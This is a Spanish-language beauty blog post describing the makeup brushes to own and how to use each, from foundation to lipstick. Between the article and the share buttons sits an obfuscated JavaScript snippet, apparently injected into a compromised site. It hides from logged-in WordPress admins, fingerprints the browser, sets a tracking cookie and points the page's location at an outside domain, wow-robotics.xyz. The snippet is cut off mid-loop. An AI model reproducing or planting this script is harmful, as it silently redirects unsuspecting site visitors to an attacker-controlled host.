Los maquilladores profesionales, utilizan infinidad de brochas y pinceles diferentes para  aplicar el maquillaje. Cada vez, hay más mujeres que recurren a estos accesorios para conseguir unos resultados profesionales desde casa y la verdad es, que el resultado se nota ¡a la legua!

 

Si quieres lucir un maquillaje 10, lo ideal es que uses una brocha para cada producto que utilices, primero por higiene y después para obtener unos resultados perfectos, ¡cómo si fueras una maquilladora profesional!

Las brochas necesarias que debes de tener en tu neceser son:

Brocha de base de maquillaje

Esta brocha sirve para maquillaje fluido, en mousse, en stick… Gracias a ella, podrás extender todo tu maquillaje de un modo cómodo y sencillo, sin dejar exceso de producto ni marcas. No es adecuado usarla para maquillajes en polvo o compactos.

Brocha para polvos de sol/polvos compactos

Es una brocha grande y con mucho pelo.  Es óptima para usar con polvos sueltos, compactos o de sol. Si lo deseas, también puedes retirar el exceso el exceso de producto o difuminar.

Brocha de colorete

Son brochas redondeadas y en algunos casos sesgadas, con el tamaño justo para alcanzar el pómulo y dejar un color impecable. Lo ideal es que aplique el producto, sobre la manzana de las mejillas mientras sonríes.

Pincel para aplicar la sombra de ojos

Suele haber varios tipos de pinceles para dar color a tus ojos. Si usas una sombra en polvo, lo ideal es que utilices un pincel de pelo sintético redondeado o en esponja.

Pincel sesgado para realizar el delineado de ojos y la marca de agua

Son pinceles precisos y con los que te será muy fácil realizar el delineado de tus ojos. Puedes controlar el grosor de la línea y también maquillar la parte interior de tus pestañas.

Pincel para aplicar la barra de labios

Lo más rápido y fácil es aplicar el producto desde la barra de labios, pero si quieres una mayor precisión y, por supuesto, unos labios pintados a prueba de errores, moja la punta del pincel sobre la barra de labios y maquilla el centro de tus labios y luego delinéalos suavemente. ¡Mostrarás una boca irresistible!

Recuerda, que según tus necesidades, podrás utilizar brochas de pelo natural o pelo sintético.

Con ayuda de estos productos, conseguirás aplicar tu maquillaje de un modo cómodo y satisfactorio. Probablemente, al principio tengas que hacer una importante inversión inicial, pero ya verás como tu maquillaje cambiará ¡cómo de la noche al día!

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone